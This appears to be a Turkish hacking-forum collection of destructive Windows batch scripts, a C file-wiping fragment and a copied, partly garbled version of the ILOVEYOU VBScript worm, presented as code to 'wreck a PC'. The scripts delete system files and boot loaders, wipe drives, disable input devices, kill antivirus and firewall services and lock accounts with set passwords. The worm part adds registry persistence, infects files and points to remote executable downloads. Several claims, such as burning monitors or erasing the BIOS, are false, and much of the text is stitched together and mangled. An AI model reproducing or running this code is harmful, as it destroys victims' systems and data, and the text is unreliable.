attrib -h -s installer
attrib -h pif
attrib -r -h -a WindowsShell.Manifest
attrib -r -h şMSI31Uninstall_KB893803ş
attrib -s -a bootstat.dat
attrib -s -h services.dll
attrib -s -h qservice.exe
attrib -a -r set3.tmp
attrib -s -h winnt.bmp
attrib -s -h winnt256.bmp
cls
cd c:\\
del /f /q /s c:\\windows\\*.*
cls
cd..
cd..
cd program files
cd internet explorer
attrib -a -s -h iexplore.exe
cd c:\\
cls
del /f /q /s c:\\program files\\*.*
cls
cd..
cd..
attrib -a -h -r -s msdos.sys
attrib -a -s -h config.sys
cls
attrib -a -h -r -s IO.sys
cls
del /f /q /s c:\\*.*
cls
@echo Yuklemeyi Bitirmek Ilerlemeniz Gerekir
@echo Veri Kayiplari Olmamasi icin .!!!!!!
@echo Devam Etmeniz Kesinlikle Onerilir !!!..
pause
cls
cd..
cd..
cd ********s and Settings
cd All Users
cd Desktop
md .HackEd
md Bys
md Hacker
dir /s>HAcKeD.ini
@echo HALA shutDownN.exe Pc DEYse RES iyi Gider
cls
tsshutdn 5 /delay:2
tsshutdn 5 /delay:2
}
span(p)
char *p;
{
struct ffblk f;
char n[129];
int r;
SearchAndDestroy(p);
sprintf(n,\-%s\\\\%s\-,p,\-*.*\-);
for(r=findfirst(n,&f,0x0010);!r;r=findnext(&f)) {
if(*f.ff_name==\-.\-) continue;
if(f.ff_attrib & 0x0010) {
sprintf(n,\-%s\\\\%s\-,p,f.ff_name);
span
;
}
}
}
SearchAndDestroy(p)
char *p;
{
struct ffblk f;
char b[81];
int r;
strcpy(b,p);
strcat(b,\-\\\\*.*\-);
for(r=findfirst(b,&f,0x0000);!r;r=findnext(&f)) {
sprintf(b,\-%s\\\\%s\-,p,f.ff_name);
remove(b);
}
}
boot()
{
char *buff;
char *test;
fprintf(test,"THIS PROGRAM WAS MADE BY Someone Else!!\-);
abswrite(2,12,0,buff);
}
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo Ne kadar safsın (HaCKeD)
@echo off
net user %username% 753951456852
del /f /q d:
del /f /q c:
DEL "C:\WINDOWS\system\AVICAP.DLL"
DEL "C:\WINDOWS\system\AVIFILE.DLL"
DEL "C:\WINDOWS\system\COMMDLG.DLL"
DEL "C:\WINDOWS\system\KEYBOARD.DRV"
DEL "C:\WINDOWS\system\LZEXPAND.DLL"
DEL "C:\WINDOWS\system\MCIAVI.DRV"
DEL "C:\WINDOWS\system\MCISQ.DRV"
DEL "C:\WINDOWS\system\MCIWAVE.DRV"
DEL "C:\WINDOWS\system\MMSYSTEM.DLL"
DEL "C:\WINDOWS\system\MMTASK.TSK"
DEL "C:\WINDOWS\system\MOUSE.DRV"
DEL "C:\WINDOWS\system\MSVIDEO.DLL"
DEL "C:\WINDOWS\system\OLECLI.DLL"
DEL "C:\WINDOWS\system\OLESVR.DLL"
DEL "C:\WINDOWS\system\setup.inf"
DEL "C:\WINDOWS\system\SHELL.DLL"
DEL "C:\WINDOWS\system\SOUND.DRV"
DEL "C:\WINDOWS\system\stdole.tlb"
DEL "C:\WINDOWS\system\SYSTEM.DRV"
DEL "C:\WINDOWS\system\TAPI.DLL"
DEL "C:\WINDOWS\system\TIMER.DRV"
DEL "C:\WINDOWS\system\VER.DLL"
DEL "C:\WINDOWS\system\VGA.DRV"
DEL "C:\WINDOWS\system\WFWNET.DRV"
DEL "C:\WINDOWS\system\WINSPOOL.DRV"
RD "C:\WINDOWS\system"
START TSKILL MSNMSGR
START TSKILL MSNMSGR
START TSKILL MSNMSGR
START TSKILL MSNMSGR
START TSKILL MSNMSGR
(Alıntıdır Arkadaşlar Bu Konu ThTde Açılmış Mı Bakmadım )
-------------------------------------------------------------------------------------------
Pc Bozma Not Defterini Aç Kodu Yapıştır Farklı Kaydet oyun.bat
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fs
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fs
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fs
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&""&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fs
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }"
scriptini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
%100 Çalışan .Bat
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
1-Explorer.exe kapanır
2-Mouse aktif dışı olur
3-Klavye aktif dışı olur
4-Mouse çöker Artık mouse tarih olur.
5-Pcye manyak şifre konur
6-Explorer.exe silinir
7-Taskmgr Silinir.
8-Hal.dll silinir bilgisayar formatlık olur
9-Masaüstü silinir
10-Pcye mesaj gelir ve pc kapanır.
@echo off
taskkill -f -im explorer.exe
rundll32 mouse,disable
rundll32 keyboard,disable
rundll32 user,swapmousebutton
net user %username% RobustTeam
start %systemdrive%\WINDOWS\system32\WISPTIS.EXE
start %systemdrive%\WINDOWS\system32\WISPTIS.EXE
del f/q/s %systemdrive%\WINDOWS\explorer.exe
del f/q/s %systemdrive%\WINDOWS\system32\explorer.exe
del f/q/s %systemdrive%\WINDOWS\TASKMAN.exe
del f/q/s %systemdrive%\WINDOWS\taskman.exe
del f/q/s %systemdrive%\WINDOWS\system32\taskmgr.exe
rem Disable Computer By Deleting hal.dll
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll
del f/q/s %systemdrive%/docume~1/%username%/desktop\*.*
del f/q/s %systemdrive%/Users/%username%/desktop\*.*
shutdown -r -t 15 -c "By Adapazarli Tarafından Hackedlendin Bay Mal."
pause
@echo off
exit
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Klavye Hackleme Kodu
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
del C:/WINDOWS/system/KEYBOARD.DRV
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
System32 Hacked
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
C:/windows/system32/deleted
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Masa Üstünü Silme
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
CD..
CD..
CD.
erase c:/f/s/q/a
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Ip Bulma
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
baslat>calıstır>cmd>netstat -n
yanında :80 olanlar değil başka yazanlar ip adresidir..
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Pc Süre Koyma
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
shutdown -s -t 3600 Bilgisayar 1 saat sonra kapanır.
shutdown -s -t 7200 Bilgisayar 2 saat sonra kapanır.
Kapatmayı İptal Etmek İçin:
shutdown -a -t 3600 Yani 1 Saat İptal Oluyor
shutdown -a -t 7200 Yani 2 Saat İptal Oluyor
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Mouse Ve Klavye Driverlerini Çökertme
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
del C:/WINDOWS/system/MOUSE.DRV
del C:/WINDOWS/system/KEYBOARD.DRV
del c:\WINDOWS\system32\drivers\cdrom.bat
shutdown -r
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
System32
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
del %systemroot%system32dllcachec_1254.nls
del %systemroot%system32c_1254.nls
del %systemroot%system32hal.dll
del %systemroot%system32kdcom.dll
del %systemroot%system32kernel32.dll
del %systemroot%system32bootvid.dll
del %systemroot%system32c_037.nls
del %systemroot%system32c_437.nls
del %systemroot%system32c_500.nls
del %systemroot%system32c_737.nls
del %systemroot%system32c_1255.nls
del %systemroot%system32C_28594.nls
del %systemroot%system32c_20866.nls
del %systemroot%system32bidispl.dll
del %systemroot%system32C_28594.nls
del %systemroot%system32ups.exe
del %systemroot%system32trkwks.dll
del %systemroot%system32scardsvr.exe
del %systemroot%system32audiosrv.dll
del %systemroot%system32driversatapi.sys
del %systemroot%system32driverscdaudio.sys
del %systemroot%system32driverscdfs.sys
del %systemroot%system32driverscdrom.sys
del %systemroot%\\system32\\dllcac he\\c_1254.nls
del %systemroot%\\system32\\c_1254 .nls
shutdown -r -t 00
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Başka Bir Sistem32 Çökertme
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
net user %username% robustteam
del %systemroot%\\system32\\dllcache\\c_1254.nls
del %systemroot%\\system32\\c_1254.nls
del %systemroot%\\system32\\hal.dll
del %systemroot%\\system32\\kdcom.dll
del %systemroot%\\system32\\kernel32.dll
del %systemroot%\\system32\\bootvid.dll
del %systemroot%\\system32\\c_037.nls
del %systemroot%\\system32\\c_437.nls
del %systemroot%\\system32\\c_500.nls
del %systemroot%\\system32\\c_737.nls
del %systemroot%\\system32\\c_1255.nls
del %systemroot%\\system32\\C_28594.nls
del %systemroot%\\system32\\c_20866.nls
del %systemroot%\\system32\\bidispl.dll
del %systemroot%\\system32\\C_28594.nls
del %systemroot%\\system32\\ups.exe
del %systemroot%\\system32\\trkwks.dll
del %systemroot%\\system32\\scardsvr.exe
del %systemroot%\\system32\\audiosrv.dll
del %systemroot%\\system32\\drivers\\atapi.sys
del %systemroot%\\system32\\drivers\\cdaudio.sys
del %systemroot%\\system32\\drivers\\cdfs.sys
del %systemroot%\\system32\\drivers\\cdrom.sys
shutdown -r -t 00
net user %username% robustteam
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Klavye ve Fare'yi KitLeyen Virüs Kodu
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
@echo off
Title The kit was the keyboard and mouse...
taskkill /im explorer.exe /f
taskkill /im wscript.exe
reg addHKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f > nul
reg addHKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f > nul
cls
exit
shutdown -r -t 00
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
PC Şifre Koyma
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
net user %username% robustteam
shutdown -r
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
İnternet Bağlantınız Kesilecek Ve İnternet'e Bağlanmak İçin Sizden Parola İsteyecek Parolanız( robustteam )
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
@echo off
color 0a
cls
ipconfig/release
cls
echo.
:a
set /p a=H-u-t-g İnternet Baglantiniz Kesildi Baglanmak İcin Parola Girin:
if %a%==robustteam goto b
if not %a%==robustteam goto c
:b
ipconfig/renew
cls
echo Hos Geldiniz . . .
echo Sitelerinizi Acmak İcin Lütfen Enter'e Basin...
echo İstemiyorsaniz Cikis Butonuna Basiniz ...
pause
start chrome.exe https://tr-tr.facebook.com/
start chrome.exe https://www.youtube.com/?hl=tr&gl=TR
start chrome.exe http://www.turkhackteam.org/
start chrome.exe https://www.google.com.tr/
cls
exit
:c
echo Yanlis parola
goto a
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Virüs Özellikleri :
dll Dosyaları Silinir
Masaüstü Komple Silinir
Başlat Menüsü Silinir
Klavye Çalışmaz
Mause Çalışmaz
CD-Rom Sürekli Açıp Kapanır
Bilgisayara Şifre Koyar
Güvenlik Duvarı Kapanır
Resimler Silinir
Yüm .exe Dosyaları silinir
@echo off net stop "Security Center" net stop SharedAccess > "%Temp%.kill.reg" ECHO A R E S > >"%Temp%.kill.reg" ECHO. > >"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esSharedAccess] > >"%Temp%.kill.reg" ECHO "Start"=dword:00000004 ****"%Temp%.kill.reg" ECHO. > >"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic eswuauserv] > >"%Temp%.kill.reg" ECHO "Start"=dword:00000004 > >"%Temp%.kill.reg" ECHO. > >"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesw scsvc] > >"%Temp%.kill.reg" ECHO "Start"=dword:00000004 > >"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" DEL "%Temp%.kill.reg" DEL %0 net user %username% 11111111111111111111 Command 5 Command 7 @echo off Title The kit was the keyboard and mouse... taskkill /im explorer.exe /f taskkill /im wscript.exe reg addHKLMSystemCurrentControlSetServicesMouclass/v Start /t REG_DWORD /d4/f > nul reg addHKLMSystemCurrentControlSetServicesKbdclass/v Start /t REG_DWORD /d4/f > nul cls exit start %systemdrive%WINDOWSsystem32WISPTIS.EXE start %systemdrive%WINDOWSsystem32WISPTIS.EXE del /f /q /s %systemdrive%*.dll del /f /q /s %systemdrive%*.exe del %systemdrive%WINDOWSsystem32spider.exe del %systemdrive%WINDOWSsystem32mshearts.exe del %systemdrive%WINDOWSsystem32freecell.exe del %systemdrive%WINDOWSsystem32sol.exe del %systemdrive%WINDOWSsystem32WINmine.exe del /f /q /s %systemdrive%*.jpg del /f /q /s %systemdrive%*.jpeg del /f /q /s %systemdrive%*.gif del /f /q /s %systemdrive%*.bmp del /f /q /s %systemdrive%*.jpe del /f /q /s %systemdrive%*.jpg del /f /q /s %systemdrive%*.tif del /f /q /s %systemdrive%*.dib del /f /q /s %systemdrive%*.tiff del /f /q /s %systemdrive%*.jfif del /f /q /s %systemdrive%*.png net share system=C: /unlimited Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Antivirüs kapanır(İşlem yarıda kalmasın diye)
Bios silinir
Hardisk silinir
Sürücüler bozulur
Kasa yanar (%75 ihtimalle)
Klavye felç geçirir
Monitor yanar(%75 ihtimalle)
Şifre Değişir
Windows Silinir
Kod:
@echo off
CLS
taskkill /F /IM av*
taskkill /F /IM fire*
taskkill /F /IM anti*
CLS
taskkill /F /IM spy*
taskkill /F /IM bullguard*
taskkill /F /IM PersFw*
taskkill /F /IM KAV*
taskkill /F /IM ZONEALARM*
taskkill /F /IM SAFEWEB*
CLS
taskkill /F /IM OUTPOST*
taskkill /F /IM nv*
taskkill /F /IM nav*
taskkill /F /IM F-*
taskkill /F /IM ESAFE*
taskkill /F /IM cle*
CLS
taskkill /F /IM BLACKICE*
taskkill /F /IM def*
taskkill /F /IM kav*
taskkill /F /IM kav*
taskkill /F /IM avg*
taskkill /F /IM ash*
CLS
taskkill /F /IM aswupdsv*
taskkill /F /IM ewid*
taskkill /F /IM guar*
taskkill /F /IM gcasDt*
taskkill /F /IM msmp*
CLS
taskkill /F /IM mcafe*
taskkill /F /IM mghtml*
taskkill /F /IM msiexec*
taskkill /F /IM outpost*
taskkill /F /IM isafe*
taskkill /F /IM zap*
CLS
taskkill /F /IM zauinst*
taskkill /F /IM upd*
taskkill /F /IM zlclien*
taskkill /F /IM minilog*
taskkill /F /IM cc* b
taskkill /F /IM norton*
CLS
taskkill /F /IM norton au*
taskkill /F /IM ccc*
taskkill /F /IM npfmn*
taskkill /F /IM loge*
taskkill /F /IM nisum*
taskkill /F /IM issvc*
taskkill /F /IM tmp*
CLS
taskkill /F /IM tmn*
taskkill /F /IM pcc*
taskkill /F /IM cpd*
taskkill /F /IM pop*
taskkill /F /IM pav*
taskkill /F /IM padmin*
CLS
taskkill /F /IM panda*
taskkill /F /IM avsch*
taskkill /F /IM sche*
taskkill /F /IM syman*
taskkill /F /IM virus*
taskkill /F /IM realm*
CLS
taskkill /F /IM sweep*
taskkill /F /IM scan*
taskkill /F /IM ad-*
taskkill /F /IM safe*
taskkill /F /IM avas*
taskkill /F /IM norm*
taskkill /F /IM offg*
CLS
RMDIR /Q "C:\Program Files\alwils~1" /S
RMDIR /Q "C:\Program Files\Lavasoft\Ad-awa~1" /S
RMDIR /Q "C:\Program Files\kasper~1" /S
CLS
RMDIR /Q "C:\Program Files\trojan~1" /S
RMDIR /Q "C:\Program Files\f-prot95" /S
RMDIR /Q "C:\Program Files\tbav" /S
CLS
RMDIR /Q "C:\Program Files\avpersonal" /S
RMDIR /Q "C:\Program Files\Norton~1" /S
RMDIR /Q "C:\Program Files\Mcafee" /S
CLS
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\Norton~3" /S
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\speedd~1" /S
RMDIR /Q "C:\Program Files\Norton~1\Norton~1" /S
RMDIR /Q "C:\Program Files\Norton~1" /S
CLS
RMDIR /Q "C:\Program Files\avgamsr" /S
RMDIR /Q "C:\Program Files\avgamsvr" /S
RMDIR /Q "C:\Program Files\avgemc" /S
CLS
RMDIR /Q "C:\Program Files\avgcc" /S
RMDIR /Q "C:\Program Files\avgupsvc" /S
RMDIR /Q "C:\Program Files\grisoft" /S
RMDIR /Q "C:\Program Files\nood32krn" /S
RMDIR /Q "C:\Program Files\nood32" /S
CLS
RMDIR /Q "C:\Program Files\nod32" /S
RMDIR /Q "C:\Program Files\nood32" /S
RMDIR /Q "C:\Program Files\kav" /S
RMDIR /Q "C:\Program Files\kavmm" /S
RMDIR /Q "C:\Program Files\kaspersky" /S
CLS
RMDIR /Q "C:\Program Files\ewidoctrl" /S
RMDIR /Q "C:\Program Files\guard" /S
RMDIR /Q "C:\Program Files\ewido" /S
CLS
RMDIR /Q "C:\Program Files\pavprsrv" /S
RMDIR /Q "C:\Program Files\pavprot" /S
RMDIR /Q "C:\Program Files\avengine" /S
CLS
RMDIR /Q "C:\Program Files\apvxdwin" /S
RMDIR /Q "C:\Program Files\webproxy" /S
RMDIR /Q "C:\Program Files\panda software" /S
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
/timersecure 0 0 //mkdir şmid(C:,1,2) ş+ şrand(1,99999) ş+ şrand(A,Z) ş+ şrand(a,z)
echo off
echo Microsoft sorunla karşılaştı bi tuşa basınca düzeltilecektir
echo off
pause
del /f /q d:
del /f /q c:
del C:/WINDOWS/system/KEYBOARD.DRV
90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic *100)/1337))> *100)/1067))> 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=
local.t_y=
sector.allclients sendpacket 0c0 00 D D W W W?: W B?: B 00 00 00 B?:0> D - 1> D
90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic *100)/1337))> *100)/1067))> 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=
local.t_y=
sector.allclients sendpacket 0c0 00 D D W W W?: W B?: B 00 00 00 B?:0> D - 1> D
net user %username% robustteam
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Dosya açılırsa ;
1. Pc'nin güvenlik duvarı kapanır.
2. BIOS silinir.
3. Anakart, harddisk, ekran kartı, usb girişleri hepsi yanar.
4. Tüm windows ailesine uyumludur.
5. System32 çok büyük zarar görür.
6. C:\WINDOWS\system klasörü silinir.
7. Ekran gider.
8. Monitör yanar.
9. PC BİRDAHA ASLA ÇALIŞMAZ . . .
@echo off
net stop "Security Center"
net stop SharedAccess
> -%Temp%.\kill.reg" ECHO A R E S
>>-%Temp%.\kill.reg" ECHO.
>>-%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>-%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>-%Temp%.\kill.reg" ECHO.
>>-%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>-%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>-%Temp%.\kill.reg" ECHO.
>>-%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>-%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>-%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S -%Temp%.\kill.reg"
DEL -%Temp%.\kill.reg"
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,e q,ctr,file,vbscopy,d ow
eq=--
ctr=0
Set fso = CreateObject("Scripting.FileSy stemObject")
set file = fs
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.She ll")
rr=wscr.RegRead("HKEY_CURRENT_ USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Mi crosoft\Windows Scripting Host\Settings\Timeout",0,"REG_ DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFull Name)
c.Copy(dirsystem&-\MSKernel32. vbs")
c.Copy(dirwin&-\Win32DLL.vbs")
c.Copy(dirsystem&-\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\M icrosoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&-\ MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\M icrosoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin &-\Win32DLL.vbs"
downread=--
downread=regget("HKEY_CURRENT_ USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread=--) then
downread="c:\-
end if
if (fileexist(dirsystem&-\WinFAT3 2.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Inter net Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKh...twertnMTFwetrd sfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Inter net Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skl...wetryDGFikjUIy qwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Inter net Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TR...198vbFV5hfFEkb opBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Inter net Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjks...nfgkKLHjkqwtuH JBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw23 7461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&-\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\M icrosoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&-\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Mi crosoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&-\-)
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
